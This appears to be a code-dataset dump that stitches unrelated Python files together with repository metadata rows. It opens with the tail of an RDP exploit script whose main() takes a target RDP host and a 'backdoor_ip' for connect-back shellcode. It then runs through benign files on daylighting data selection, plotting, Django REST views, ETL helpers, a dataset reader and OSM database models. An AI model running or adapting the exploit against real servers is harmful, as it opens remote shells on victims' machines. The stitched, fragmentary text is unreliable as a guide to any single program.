def buildProtocol(self, addr):
return self.server.tcp
def run(self):
endpoint = HostnameEndpoint(reactor, self.host, self.port)
endpoint.connect(self)
self.reactor.run()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("rdp_host", help="the target RDP server's ip address")
parser.add_argument("-rp", "--rdpport", type=int, default=3389, help="the target RDP server's port number", required=False)
parser.add_argument("backdoor_ip", help="the ip address for connect-back shellcode")
parser.add_argument("-bp", "--backport", type=int, default=4444, help="the port number for connect-back shellcode", required=False)
args = parser.parse_args()
exploit = Exploit(reactor, args.rdp_host, args.rdpport, args.backdoor_ip, args.backport)
#exploit.appendChannel('drdynvc', ChannelOption.CHANNEL_OPTION_INITIALIZED)
#exploit.appendChannel(MCSChannelName.CLIPBOARD, ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.appendChannel(MCSChannelName.DEVICE_REDIRECTION, ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.appendChannel('RDPSND', ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.appendChannel('MS_T120', ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.run()
print('done')
if __name__ == '__main__':
main()
| 44.699454 | 3,207 | 0.724165 | 21,299 | 0.86793 | 0 | 0 | 0 | 0 | 0 | 0 | 6,024 | 0.245477 |
7b5cf1180972e7b3ffbdfafed33eb97b3d3772b4 | 8,241 | py | Python | deep_light/random_selection_threeInputs.py | maqorbani/neural-daylighting | 753c86dfea32483a7afbf213a7b7684e070d3672 | [
"Apache-2.0"
]
| 4 | 2020-08-24T03:12:22.000Z | 2020-08-27T17:13:56.000Z | deep_light/random_selection_threeInputs.py | maqorbani/neural-daylighting | 753c86dfea32483a7afbf213a7b7684e070d3672 | [
"Apache-2.0"
]
| 4 | 2020-08-24T07:30:51.000Z | 2021-02-20T10:18:47.000Z | deep_light/random_selection_threeInputs.py | maqorbani/neural-daylighting | 753c86dfea32483a7afbf213a7b7684e070d3672 | [
"Apache-2.0"
]
| 3 | 2020-04-08T17:37:40.000Z | 2020-08-24T07:32:52.000Z |
#
#
# Copyright (c) 2020. Yue Liu
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# If you find this code useful please cite:
# Predicting Annual Equirectangular Panoramic Luminance Maps Using Deep Neural Networks,
# Yue Liu, Alex Colburn and and Mehlika Inanici. 16th IBPSA International Conference and Exhibition, Building Simulation 2019.
#
#
#
import os
import numpy as np
from matplotlib import pyplot as plt
from deep_light import time_to_sun_angles
import shutil
from deep_light.genData import get_data_path
####randomly select the test data from the dataset
#### TODO make a function with source and destination subdirectoies
def select_test_samples(data_root='./ALL_DATA_FP32',
LATITUDE=47,
LONGITUDE=122,
SM=120,
NUM_SAMPLES = 500):
import os
#read seattle weahter txt data
#return data format as al, az, dir, dif
def readTxt():
#read each line
#transfer the time to sun angles
#save the data
f = open("testseattle.txt", "r")
lines = f.readlines()
data=np.zeros([4709, 7])
i =0
for line in lines:
month = int(line.splitlines()[0].split(",")[0])
date = int(line.splitlines()[0].split(",")[1])
time = float(line.splitlines()[0].split(",")[2])
dir = int(line.splitlines()[0].split(",")[3])
dif = int(line.splitlines()[0].split(",")[4])
al, az = time_to_sun_angles.timeToAltitudeAzimuth(date, month, time, LATITUDE, LONGITUDE, SM)
if(dir > 10) or (dif > 10):
data[i]=np.array([dir, dif, al, az, month, date, time])
i = i + 1
print(data.shape)
return data
# These parameters are location related. Right now we use Seattle's parameters.
AB4_DIR = data_root + get_data_path('AB4')
AB0_DIR = data_root + get_data_path('AB0')
SKY_DIR = data_root + get_data_path('SKY')
data = readTxt()
idx = np.arange(data.shape[0])
np.random.shuffle(idx)
n_im = data.shape[0]
train, test = data[idx[:NUM_SAMPLES]], data[idx[NUM_SAMPLES:]]
cwd = os.getcwd()
test_all = './data/original_test_all'
if not os.path.exists('./data'):
os.makedirs("./data")
if not os.path.exists(test_all):
os.mkdir(test_all)
os.chdir(test_all)
if (os.path.exists("./result_combo_random")):
shutil.rmtree("./result_combo_random")
os.makedirs("./result_combo_random")
fig = plt.figure(figsize=(10, 10), dpi=150)
plt.scatter(train[:, 0], train[:, 1], s=10, color='r', label="train")
plt.scatter(test[:, 0], test[:, 1], s=1, color='g', label="test")
plt.title("Sky Direct and Diffuse Irradiances Distribution", size=16)
plt.xlabel('Direct')
plt.ylabel('Diffuse')
plt.legend(fancybox=True)
plt.savefig('./result_combo_random/sky.png')
plt.close()
fig = plt.figure(figsize=(10, 10), dpi=150)
plt.scatter(train[:, 2],train[:, 3], s=10, color='r', label="train")
plt.scatter(test[:, 2], test[:, 3], s=1, color='g', label="test")
plt.title("Sun Altitude and Azimuth Distribution", size=16)
plt.xlabel('Altitude')
plt.ylabel('Azimuth')
plt.legend(fancybox=True)
plt.savefig('./result_combo_random/sun.png')
plt.close()
if (os.path.exists("./test_ab0")):
shutil.rmtree("./test_ab0")
if (os.path.exists("./test_ab4")):
shutil.rmtree("./test_ab4")
if (os.path.exists("./test_sky_ab4")):
shutil.rmtree("./test_sky_ab4")
os.makedirs("./test_ab0")
os.makedirs("./test_ab4")
os.makedirs("./test_sky_ab4")
os.chdir(cwd)
#put the data into two folders train and test
from shutil import copyfile
import os.path
i = 0
bad_samples = 0
for i in range(NUM_SAMPLES):
file_name = "pano_" + str(int(train[i][4])) + "_" + str(int(train[i][5])) + "_" + str(train[i][6]) + "_" + str(int(train[i][0])) \
+ "_" + str(int(train[i][1]))
src_ab4 = AB4_DIR + file_name + ".npy"
src_ab0 = AB0_DIR + file_name + "_ab0.npy"
src_sky = SKY_DIR + file_name + ".npy"
dst_ab0 = test_all + "/test_ab0/"+ file_name + "_ab0.npy"
dst_ab4 = test_all + "/test_ab4/" + file_name + ".npy"
dst_sky = test_all + "/test_sky_ab4/" + file_name + ".npy"
if (os.path.isfile(src_ab4)) and (os.path.isfile(src_ab0)) and (os.path.isfile(src_sky)):
copyfile(src_ab4, dst_ab4)
copyfile(src_ab0, dst_ab0)
copyfile(src_sky, dst_sky)
else:
bad_samples = bad_samples + 1
print('unable to locate:')
if not os.path.isfile(src_ab4) : print(src_ab4)
if not os.path.isfile(src_ab0) : print(src_ab0)
if not os.path.isfile(src_sky) : print(src_sky)
i = i + 1
print('Maps not found = ', bad_samples)
def sample_consistency(data_root='./ALL_DATA_FP32',
LATITUDE=47,
LONGITUDE=122,
SM=120):
import os
#read seattle weahter txt data
#return data format as al, az, dir, dif
def readTxt():
#read each line
#transfer the time to sun angles
#save the data
f = open("testseattle.txt", "r")
lines = f.readlines()
data=np.zeros([4709, 7])
i =0
for line in lines:
month = int(line.splitlines()[0].split(",")[0])
date = int(line.splitlines()[0].split(",")[1])
time = float(line.splitlines()[0].split(",")[2])
dir = int(line.splitlines()[0].split(",")[3])
dif = int(line.splitlines()[0].split(",")[4])
al, az = time_to_sun_angles.timeToAltitudeAzimuth(date, month, time, LATITUDE, LONGITUDE, SM)
if(dir > 10) or (dif > 10):
data[i]=np.array([dir, dif, al, az, month, date, time])
i = i + 1
print(data.shape)
return data
# These parameters are location related. Right now we use Seattle's parameters.
AB4_DIR = data_root + get_data_path('AB4')
AB0_DIR = data_root + get_data_path('AB0')
SKY_DIR = data_root + get_data_path('SKY')
data = readTxt()
idx = np.arange(data.shape[0])
n_im = data.shape[0]
train, test = data[idx], data[idx]
test_all = './data/original_test_all'
import os.path
i = 0
bad_samples = 0
good_samples = 0
for i in range(data.shape[0]):
file_name = "pano_" + str(int(train[i][4])) + "_" + str(int(train[i][5])) + "_" + str(train[i][6]) + "_" + str(int(train[i][0])) \
+ "_" + str(int(train[i][1]))
src_ab4 = AB4_DIR + file_name + ".npy"
src_ab0 = AB0_DIR + file_name + "_ab0.npy"
src_sky = SKY_DIR + file_name + ".npy"
dst_ab0 = test_all + "/test_ab0/"+ file_name + "_ab0.npy"
dst_ab4 = test_all + "/test_ab4/" + file_name + ".npy"
dst_sky = test_all + "/test_sky_ab4/" + file_name + ".npy"
if (os.path.isfile(src_ab4)) and (os.path.isfile(src_ab0)) and (os.path.isfile(src_sky)):
good_samples = good_samples + 1
else:
bad_samples = bad_samples + 1
print('unable to locate:')
if not os.path.isfile(src_ab4) : print(src_ab4)
if not os.path.isfile(src_ab0) : print(src_ab0)
if not os.path.isfile(src_sky) : print(src_sky)
i = i + 1
print('Maps not found = ', bad_samples)
#finish the rest part
| 31.818533 | 138 | 0.580876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,340 | 0.283946 |
7b5e2470f1d47ae2237ac46314f2765d06fcd634 | 1,993 | py | Python | graphs/ops.py | andreipoe/sve-analysis-tools | 696d9a82af379564b05ce0207a6f872211a819eb | [
"MIT"
]
| 2 | 2020-12-23T02:22:20.000Z | 2020-12-31T17:30:56.000Z | graphs/ops.py | andreipoe/sve-analysis-tools | 696d9a82af379564b05ce0207a6f872211a819eb | [
"MIT"
]
| null | null | null | graphs/ops.py | andreipoe/sve-analysis-tools | 696d9a82af379564b05ce0207a6f872211a819eb | [
"MIT"
]
| 3 | 2020-06-03T17:05:45.000Z | 2021-12-26T13:45:49.000Z | #!/usr/bin/env python3
import argparse
import sys
from concurrent.futures import ThreadPoolExecutor
import pandas as pd
import altair as alt
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--application', help='Plot only the given application')
parser.add_argument('data', help='The data to plot, in CSV or DataFrame pickle format')
return parser.parse_args()
# Plots application `appname`
def plot(results, appname):
appdata = results[results.application == appname]
if len(appdata) == 0:
print(f'No data to plot for {appname}.')
return
if appdata[appdata.svewidth == 0].groupby('version').sum()['count'].max() >= 1e9:
scale = 'billion'
appdata.loc[:, 'count'] /= 1e9
else:
scale = 'million'
appdata.loc[:, 'count'] /= 1e6
fname = f'opcount-{appname}-all-clustered-stacked-group.png'
alt.Chart(appdata).mark_bar().encode(x=alt.X('version', title='', axis=alt.Axis(labelAngle=-30)),
y=alt.Y('sum(count)', title=f'Dynamic execution count ({scale} instructions)'),
column='svewidth',
color=alt.Color('optype', title='Op Group', scale=alt.Scale(scheme='set2')))\
.configure(background='white')\
.configure_title(anchor='middle', fontSize=14)\
.properties(title=appname)\
.save(fname, scale_factor='2.0')
print(f'Saved plot for {appname} in {fname}.')
def main():
args = parse_args()
if args.data.endswith('csv'):
df = pd.read_csv(args.data)
else:
df = pd.read_pickle(args.data)
df['svewidth'] = pd.to_numeric(df.svewidth)
applications = [args.application] if args.application else pd.unique(df['application'])
with ThreadPoolExecutor() as executor:
for a in applications:
executor.submit(plot, df, a)
if __name__ == '__main__':
main()
| 30.661538 | 114 | 0.610637 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 498 | 0.249875 |
7b600881aefecd926df3678ce829274a46e661ba | 18 | py | Python | schicexplorer/_version.py | joachimwolff/scHiCExplorer | 8aebb444f3968d398c260690c89c9cd0e3186f0e | [
"MIT"
]
| 10 | 2019-12-09T04:11:18.000Z | 2021-03-24T15:29:06.000Z | common/walt/common/version.py | drakkar-lig/walt-python-packages | b778992e241d54b684f54715d83c4aff98a01db7 | [
"BSD-3-Clause"
]
| 73 | 2016-04-29T13:17:26.000Z | 2022-03-01T15:06:48.000Z | common/walt/common/version.py | drakkar-lig/walt-python-packages | b778992e241d54b684f54715d83c4aff98a01db7 | [
"BSD-3-Clause"
]
| 3 | 2019-03-18T14:27:56.000Z | 2021-06-03T12:07:02.000Z | __version__ = '7'
| 9 | 17 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.166667 |
7b60c81cc28198aaec6b287552d4028bec373d4b | 2,918 | py | Python | bluebottle/organizations/views.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
]
| 10 | 2015-05-28T18:26:40.000Z | 2021-09-06T10:07:03.000Z | bluebottle/organizations/views.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
]
| 762 | 2015-01-15T10:00:59.000Z | 2022-03-31T15:35:14.000Z | bluebottle/organizations/views.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
]
| 9 | 2015-02-20T13:19:30.000Z | 2022-03-08T14:09:17.000Z | from rest_framework import generics
from rest_framework import filters
from bluebottle.utils.permissions import IsAuthenticated, IsOwnerOrReadOnly, IsOwner
from rest_framework_json_api.pagination import JsonApiPageNumberPagination
from rest_framework_json_api.parsers import JSONParser
from rest_framework_json_api.views import AutoPrefetchMixin
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from bluebottle.bluebottle_drf2.renderers import BluebottleJSONAPIRenderer
from bluebottle.organizations.serializers import (
OrganizationSerializer, OrganizationContactSerializer
)
from bluebottle.organizations.models import (
Organization, OrganizationContact
)
class OrganizationPagination(JsonApiPageNumberPagination):
page_size = 8
class OrganizationContactList(AutoPrefetchMixin, generics.CreateAPIView):
queryset = OrganizationContact.objects.all()
serializer_class = OrganizationContactSerializer
permission_classes = (IsAuthenticated, )
filter_backends = (filters.SearchFilter,)
search_fields = ['name']
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
authentication_classes = (
JSONWebTokenAuthentication,
)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
class OrganizationContactDetail(AutoPrefetchMixin, generics.RetrieveUpdateAPIView):
queryset = OrganizationContact.objects.all()
serializer_class = OrganizationContactSerializer
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
permission_classes = (IsAuthenticated, IsOwner)
authentication_classes = (
JSONWebTokenAuthentication,
)
class OrganizationSearchFilter(filters.SearchFilter):
search_param = "filter[search]"
class OrganizationList(AutoPrefetchMixin, generics.ListCreateAPIView):
model = Organization
queryset = Organization.objects.all()
serializer_class = OrganizationSerializer
pagination_class = OrganizationPagination
filter_backends = (OrganizationSearchFilter, )
search_fields = ['name']
permission_classes = (IsAuthenticated,)
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
authentication_classes = (
JSONWebTokenAuthentication,
)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
prefetch_for_includes = {
'owner': ['owner'],
}
class OrganizationDetail(AutoPrefetchMixin, generics.RetrieveUpdateAPIView):
model = Organization
queryset = Organization.objects.all()
serializer_class = OrganizationSerializer
permission_classes = (IsAuthenticated, IsOwnerOrReadOnly)
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
authentication_classes = (
JSONWebTokenAuthentication,
)
| 30.715789 | 84 | 0.778958 | 2,203 | 0.754969 | 0 | 0 | 0 | 0 | 0 | 0 | 42 | 0.014393 |
7b6172efe890112ba2bd4d2808ee33bca9779adb | 1,646 | py | Python | gen3_etl/utils/defaults.py | ohsu-comp-bio/gen3-etl | 9114f75cc8c8085111152ce0ef686a8a12f67f8e | [
"MIT"
]
| 1 | 2020-01-22T17:05:58.000Z | 2020-01-22T17:05:58.000Z | gen3_etl/utils/defaults.py | ohsu-comp-bio/gen3-etl | 9114f75cc8c8085111152ce0ef686a8a12f67f8e | [
"MIT"
]
| 2 | 2019-02-08T23:24:58.000Z | 2021-05-13T22:42:28.000Z | gen3_etl/utils/defaults.py | ohsu-comp-bio/gen3_etl | 9114f75cc8c8085111152ce0ef686a8a12f67f8e | [
"MIT"
]
| null | null | null | from gen3_etl.utils.cli import default_argument_parser
from gen3_etl.utils.ioutils import JSONEmitter
import os
import re
DEFAULT_OUTPUT_DIR = 'output/default'
DEFAULT_EXPERIMENT_CODE = 'default'
DEFAULT_PROJECT_ID = 'default-default'
def emitter(type=None, output_dir=DEFAULT_OUTPUT_DIR, **kwargs):
"""Creates a default emitter for type."""
return JSONEmitter(os.path.join(output_dir, '{}.json'.format(type)), compresslevel=0, **kwargs)
def default_parser(output_dir, experiment_code, project_id):
parser = default_argument_parser(
output_dir=output_dir,
description='Reads bcc json and writes gen3 json ({}).'.format(output_dir)
)
parser.add_argument('--experiment_code', type=str,
default=experiment_code,
help='Name of gen3 experiment ({}).'.format(experiment_code))
parser.add_argument('--project_id', type=str,
default=project_id,
help='Name of gen3 program-project ({}).'.format(project_id))
parser.add_argument('--schema', type=bool,
default=True,
help='generate schemas (true).'.format(experiment_code))
return parser
def path_to_type(path):
"""Get the type (snakecase) of a vertex file"""
return snake_case(os.path.basename(path).split('.')[0])
def snake_case(name):
"""Converts name to snake_case."""
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def camel_case(snake_str):
others = snake_str.split('_')
return ''.join([*map(str.title, others)])
| 35.782609 | 99 | 0.643378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 413 | 0.250911 |
7b6408ae7e94f31c2cccd6d4bff3b3ad42baca0f | 6,266 | py | Python | csrank/dataset_reader/discretechoice/tag_genome_discrete_choice_dataset_reader.py | kiudee/cs-ranking | 47cf648fa286c37b9214bbad1926004d4d7d9796 | [
"Apache-2.0"
]
| 65 | 2018-02-12T13:18:13.000Z | 2021-12-18T12:01:51.000Z | csrank/dataset_reader/discretechoice/tag_genome_discrete_choice_dataset_reader.py | kiudee/cs-ranking | 47cf648fa286c37b9214bbad1926004d4d7d9796 | [
"Apache-2.0"
]
| 189 | 2018-02-13T10:11:55.000Z | 2022-03-12T16:36:23.000Z | csrank/dataset_reader/discretechoice/tag_genome_discrete_choice_dataset_reader.py | kiudee/cs-ranking | 47cf648fa286c37b9214bbad1926004d4d7d9796 | [
"Apache-2.0"
]
| 19 | 2018-03-08T15:39:31.000Z | 2020-11-18T12:46:36.000Z | import logging
import numpy as np
from sklearn.utils import check_random_state
from csrank.constants import DISCRETE_CHOICE
from csrank.dataset_reader.tag_genome_reader import critique_dist
from csrank.dataset_reader.util import get_key_for_indices
from ..tag_genome_reader import TagGenomeDatasetReader
from ...util import convert_to_label_encoding
logger = logging.getLogger(__name__)
class TagGenomeDiscreteChoiceDatasetReader(TagGenomeDatasetReader):
def __init__(self, dataset_type="similarity", **kwargs):
super(TagGenomeDiscreteChoiceDatasetReader, self).__init__(
learning_problem=DISCRETE_CHOICE, **kwargs
)
dataset_func_dict = {
"nearest_neighbour": self.make_nearest_neighbour_dataset,
"critique_fit_less": self.make_critique_fit_dataset(direction=-1),
"critique_fit_more": self.make_critique_fit_dataset(direction=1),
"dissimilar_nearest_neighbour": self.make_dissimilar_nearest_neighbour_dataset,
"dissimilar_critique_more": self.make_dissimilar_critique_dataset(
direction=1
),
"dissimilar_critique_less": self.make_dissimilar_critique_dataset(
direction=-1
),
}
if dataset_type not in dataset_func_dict:
raise ValueError(
f"dataset_type must be one of {set(dataset_func_dict.keys())}"
)
logger.info("Dataset type: {}".format(dataset_type))
self.dataset_function = dataset_func_dict[dataset_type]
def make_nearest_neighbour_dataset(self, n_instances, n_objects, seed, **kwargs):
X, scores = super(
TagGenomeDiscreteChoiceDatasetReader, self
).make_nearest_neighbour_dataset(
n_instances=n_instances, n_objects=n_objects, seed=seed
)
# Higher the similarity lower the rank of the object, getting the object with second highest similarity
Y = np.argsort(scores, axis=1)[:, -2]
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
def make_critique_fit_dataset(self, direction):
def dataset_generator(n_instances, n_objects, seed, **kwargs):
X, scores = super(
TagGenomeDiscreteChoiceDatasetReader, self
).make_critique_fit_dataset(
n_instances=n_instances,
n_objects=n_objects,
seed=seed,
direction=direction,
)
Y = scores.argmax(axis=1)
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
return dataset_generator
def make_dissimilar_nearest_neighbour_dataset(
self, n_instances, n_objects, seed, **kwargs
):
logger.info(
"For instances {} objects {}, seed {}".format(n_instances, n_objects, seed)
)
X, scores = super(
TagGenomeDiscreteChoiceDatasetReader, self
).make_nearest_neighbour_dataset(
n_instances=n_instances, n_objects=n_objects, seed=seed
)
# Higher the similarity lower the rank of the object, getting the object with second highest similarity
Y = np.argsort(scores, axis=1)[:, 0]
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
def make_dissimilar_critique_dataset(self, direction):
def dataset_generator(n_instances, n_objects, seed, **kwargs):
logger.info(
"For instances {} objects {}, seed {}, direction {}".format(
n_instances, n_objects, seed, direction
)
)
random_state = check_random_state(seed)
X = []
scores = []
length = int(n_instances / self.n_movies) + 1
popular_tags = self.get_genre_tag_id()
for i, feature in enumerate(self.movie_features):
if direction == 1:
quartile_tags = np.where(
np.logical_and(feature >= 1 / 3, feature < 2 / 3)
)[0]
else:
quartile_tags = np.where(feature > 1 / 2)[0]
if len(quartile_tags) < length:
quartile_tags = popular_tags
tag_ids = random_state.choice(quartile_tags, size=length)
distances = [
self.similarity_matrix[get_key_for_indices(i, j)]
for j in range(self.n_movies)
]
critique_d = critique_dist(
feature,
self.movie_features,
tag_ids,
direction=direction,
relu=False,
)
critique_fit = np.multiply(critique_d, distances)
orderings = np.argsort(critique_fit, axis=-1)[:, ::-1]
minimum = np.zeros(length, dtype=int)
for k, dist in enumerate(critique_fit):
quartile = np.percentile(dist, [0, 5])
last = np.where(
np.logical_and((dist >= quartile[0]), (dist <= quartile[1]))
)[0]
if i in last:
index = np.where(last == i)[0][0]
last = np.delete(last, index)
minimum[k] = random_state.choice(last, size=1)[0]
orderings = orderings[:, 0 : n_objects - 2]
orderings = np.append(orderings, minimum[:, None], axis=1)
orderings = np.append(
orderings, np.zeros(length, dtype=int)[:, None] + i, axis=1
)
for o in orderings:
random_state.shuffle(o)
scores.extend(critique_fit[np.arange(length)[:, None], orderings])
X.extend(self.movie_features[orderings])
X = np.array(X)
scores = np.array(scores)
indices = random_state.choice(X.shape[0], n_instances, replace=False)
X = X[indices, :, :]
scores = scores[indices, :]
Y = scores.argmin(axis=1)
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
return dataset_generator
| 42.62585 | 111 | 0.57804 | 5,873 | 0.937281 | 0 | 0 | 0 | 0 | 0 | 0 | 527 | 0.084105 |
7b6453cb804d74096b8a1f23797b8a9e957ae61c | 12,614 | py | Python | tests/conversion/converters/inside_worker_test/declarative_schema/osm_models.py | tyrasd/osmaxx | da4454083d17b2ef8b0623cad62e39992b6bd52a | [
"MIT"
]
| 27 | 2015-03-30T14:17:26.000Z | 2022-02-19T17:30:44.000Z | tests/conversion/converters/inside_worker_test/declarative_schema/osm_models.py | tyrasd/osmaxx | da4454083d17b2ef8b0623cad62e39992b6bd52a | [
"MIT"
]
| 483 | 2015-03-09T16:58:03.000Z | 2022-03-14T09:29:06.000Z | tests/conversion/converters/inside_worker_test/declarative_schema/osm_models.py | tyrasd/osmaxx | da4454083d17b2ef8b0623cad62e39992b6bd52a | [
"MIT"
]
| 6 | 2015-04-07T07:38:30.000Z | 2020-04-01T12:45:53.000Z | # coding: utf-8
from geoalchemy2 import Geometry
from sqlalchemy import BigInteger, Column, DateTime, Float, Integer, SmallInteger, Table, Text, TEXT, BIGINT
from sqlalchemy.dialects.postgresql import HSTORE
from sqlalchemy.dialects.postgresql import ARRAY
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
t_osm_line = Table(
'osm_line', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('tracktype', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
Column('z_order', SmallInteger),
Column('way_area', Float),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='LineString', srid=900913), index=True)
)
class OsmNode(Base):
__tablename__ = 'osm_nodes'
id = Column(BigInteger, primary_key=True)
lat = Column(Integer, nullable=False)
lon = Column(Integer, nullable=False)
tags = Column(ARRAY(TEXT()))
t_osm_point = Table(
'osm_point', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('ele', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
Column('z_order', SmallInteger),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='Point', srid=900913), index=True)
)
t_osm_polygon = Table(
'osm_polygon', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('tracktype', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
